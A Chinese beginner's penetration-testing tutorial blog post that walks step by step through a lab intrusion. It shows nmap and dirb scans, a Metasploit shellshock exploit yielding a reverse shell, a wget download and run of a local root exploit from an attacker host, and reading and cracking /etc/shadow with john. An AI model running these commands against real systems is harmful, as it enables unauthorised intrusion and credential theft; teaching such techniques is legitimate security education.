【视频讲解】渗透测试初学者应掌握的常用技巧和思路

作者:FancyPig | 发布时间: | 更新时间:

相关阅读

data-postsbox="{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}">{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":5494,"title":"【视频教程】如何高效、优雅地破解密码?hydra、Hashcat你值得拥有!","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2021/12/20211218022439993.png","cover_video":"","views":5287,"comment_count":167,"category":"cybersecurity","is_forum_post":false}">{"id":5494,"title":"【视频教程】如何高效、优雅地破解密码?hydra、Hashcat你值得拥有!","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2021/12/20211218022439993.png","cover_video":"","views":5287,"comment_count":167,"category":"cybersecurity","is_forum_post":false}

视频讲解

图文讲解

初学者可以参考的渗透测试三大步骤

  • 扫描设备/服务
  • 寻找脆弱性/漏洞
  • 进行POST请求测试/使用EXP进行漏洞利用

那么扫描设备/服务,这里主要使用到的就是Nmap,我们之前在信息主动收集里有详细讲解过

data-postsbox="{"id":11160,"title":"【零基础学渗透】主动信息收集","author":"Sec-Labs","author_id":10015,"cover_image":"","cover_video":"","views":9676,"comment_count":485,"category":"cybersecurity","is_forum_post":false}">{"id":11160,"title":"【零基础学渗透】主动信息收集","author":"Sec-Labs","author_id":10015,"cover_image":"","cover_video":"","views":9676,"comment_count":485,"category":"cybersecurity","is_forum_post":false}

视频中使用的命令主要是扫描设备的服务-sV和操作系统的版本号-O,要扫码全端口使用-p指定端口范围

sudo nmap 192.168.0.114 -sV -O -p1-65535

然后静等一会儿就可以看到扫描结果了

然后,我们就可以尝试寻找漏洞了,今天我们主要利用的Apache的漏洞,做完了端口和服务的扫描,我们可以进行目录扫描,接下来使用的是dirb工具

dirb http://192.168.0.114

然后我们发现了cgi-bin这个路径,我们尝试进行漏洞的挖掘

我们这里使用metasploit渗透测试框架,输入

sudo msfconsole

然后寻找对应的模块

search shellshock

我们这里要使用的是第一个

use 1

然后设置好相关的选项RHOSTSRPATHTARGETURI

set RHOSTS 192.168.0.114
set RPATH /bin
set TARGETURI /cgi-bin/hello_world.sh

然后进行执行

exploit

我们发现出现session会话的出现,代表反弹shell已经连接成功

那现在相当于我们已经托管了这台服务器的终端,我们可以输入命令,譬如sysinfo来查看系统信息、whoami来查看用户身份

这里我们发现我们没有获得root权限,因此无法查看存储的密码情况,这时我们需要研究如何提升权限,我们可以通过wget或者curl命令下载恶意脚本来完成权限提升,这里使用的是下面命令来下载37292.c恶意提权的c语言文件(该文件代码可以在这里查看,参考https://github.com/offensive-security/exploitdb/blob/master/exploits/linux/local/37292.c

wget http://192.168.0.192/37292.c

然后使用gcc进行编译,生成ofs文件

gcc 37292.c -o ofs

然后给予可以执行权限,并运行

chmod +x ofs
./ofs

这时我们继续输入whoami,可以看到奇迹发生了,我们已经成为root管理员了

然后,我们只需要输入

cat /etc/passwd
cat /etc/shadow

就可以查看加密的密码了,我们可以将其复制保存到passwdshadow文件中(文件名字你也可以叫别的),然后就可以进行离线破解了,我们之前提到的hashcat可以破解,这里使用的是john,我们也讲解一下

这里需要先将我们之前存储的passwdshadow文件合并在一起,生成unshadowed.txt

unshadow passwd shadow > unshadowed.txt 

使用我们的字典对其进行破解,还原其中的用户名和密码

john --wordlist=/usr/share/wordlist/rockyou.txt unshadowed.txt

输入下面命令可以查看结果

john --show unshadowed.txt

这里我们发现获得了用户名和密码均为vagrant的用户,这时,我们可以尝试通过ssh看看能不能访问到服务器!

总结一下,如果我们入侵成功了。

需要寻找是否存在FTP、SSH、web页面可供我们连接。

同时,我们还需要尝试看看能不能提权拿到root管理员权限

标签:渗透测试, post请求, 零基础渗透, 零基础渗透测试, 零基础渗透网站, 渗透测试技巧, 渗透测试技巧有哪些, 初学者, 渗透测试初学者, 渗透测试小白秘籍, 渗透测试小白怎么入门